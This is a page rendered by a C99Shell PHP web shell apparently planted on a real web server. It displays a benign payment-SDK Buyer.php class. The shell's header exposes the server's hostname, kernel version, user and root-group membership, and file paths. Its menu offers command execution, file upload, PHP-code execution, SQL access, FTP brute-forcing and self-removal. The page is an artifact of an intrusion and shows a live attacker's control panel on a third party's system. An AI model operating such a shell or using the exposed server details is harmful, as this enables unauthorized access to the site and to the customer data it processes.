!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/iyzico/iyzipay-php/src/Iyzipay/Model/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Buyer.php (4.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Iyzipay\Model;

use 
Iyzipay\BaseModel;
use 
Iyzipay\JsonBuilder;
use 
Iyzipay\RequestStringBuilder;

class 
Buyer extends BaseModel
{
    private 
$id;
    private 
$name;
    private 
$surname;
    private 
$identityNumber;
    private 
$email;
    private 
$gsmNumber;
    private 
$registrationDate;
    private 
$lastLoginDate;
    private 
$registrationAddress;
    private 
$city;
    private 
$country;
    private 
$zipCode;
    private 
$ip;

    public function 
getId()
    {
        return 
$this->id;
    }

    public function 
setId($id)
    {
        
$this->id $id;
    }

    public function 
getName()
    {
        return 
$this->name;
    }

    public function 
setName($name)
    {
        
$this->name $name;
    }

    public function 
getSurname()
    {
        return 
$this->surname;
    }

    public function 
setSurname($surname)
    {
        
$this->surname $surname;
    }

    public function 
getIdentityNumber()
    {
        return 
$this->identityNumber;
    }

    public function 
setIdentityNumber($identityNumber)
    {
        
$this->identityNumber $identityNumber;
    }

    public function 
getEmail()
    {
        return 
$this->email;
    }

    public function 
setEmail($email)
    {
        
$this->email $email;
    }

    public function 
getGsmNumber()
    {
        return 
$this->gsmNumber;
    }

    public function 
setGsmNumber($gsmNumber)
    {
        
$this->gsmNumber $gsmNumber;
    }

    public function 
getRegistrationDate()
    {
        return 
$this->registrationDate;
    }

    public function 
setRegistrationDate($registrationDate)
    {
        
$this->registrationDate $registrationDate;
    }

    public function 
getLastLoginDate()
    {
        return 
$this->lastLoginDate;
    }

    public function 
setLastLoginDate($lastLoginDate)
    {
        
$this->lastLoginDate $lastLoginDate;
    }

    public function 
getRegistrationAddress()
    {
        return 
$this->registrationAddress;
    }

    public function 
setRegistrationAddress($registrationAddress)
    {
        
$this->registrationAddress $registrationAddress;
    }

    public function 
getCity()
    {
        return 
$this->city;
    }

    public function 
setCity($city)
    {
        
$this->city $city;
    }

    public function 
getCountry()
    {
        return 
$this->country;
    }

    public function 
setCountry($country)
    {
        
$this->country $country;
    }

    public function 
getZipCode()
    {
        return 
$this->zipCode;
    }

    public function 
setZipCode($zipCode)
    {
        
$this->zipCode $zipCode;
    }

    public function 
getIp()
    {
        return 
$this->ip;
    }

    public function 
setIp($ip)
    {
        
$this->ip $ip;
    }

    public function 
getJsonObject()
    {
        return 
JsonBuilder::create()
            ->
add("id"$this->getId())
            ->
add("name"$this->getName())
            ->
add("surname"$this->getSurname())
            ->
add("identityNumber"$this->getIdentityNumber())
            ->
add("email"$this->getEmail())
            ->
add("gsmNumber"$this->getGsmNumber())
            ->
add("registrationDate"$this->getRegistrationDate())
            ->
add("lastLoginDate"$this->getLastLoginDate())
            ->
add("registrationAddress"$this->getRegistrationAddress())
            ->
add("city"$this->getCity())
            ->
add("country"$this->getCountry())
            ->
add("zipCode"$this->getZipCode())
            ->
add("ip"$this->getIp())
            ->
getObject();
    }

    public function 
toPKIRequestString()
    {
        return 
RequestStringBuilder::create()
            ->
append("id"$this->getId())
            ->
append("name"$this->getName())
            ->
append("surname"$this->getSurname())
            ->
append("identityNumber"$this->getIdentityNumber())
            ->
append("email"$this->getEmail())
            ->
append("gsmNumber"$this->getGsmNumber())
            ->
append("registrationDate"$this->getRegistrationDate())
            ->
append("lastLoginDate"$this->getLastLoginDate())
            ->
append("registrationAddress"$this->getRegistrationAddress())
            ->
append("city"$this->getCity())
            ->
append("country"$this->getCountry())
            ->
append("zipCode"$this->getZipCode())
            ->
append("ip"$this->getIp())
            ->
getRequestString();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--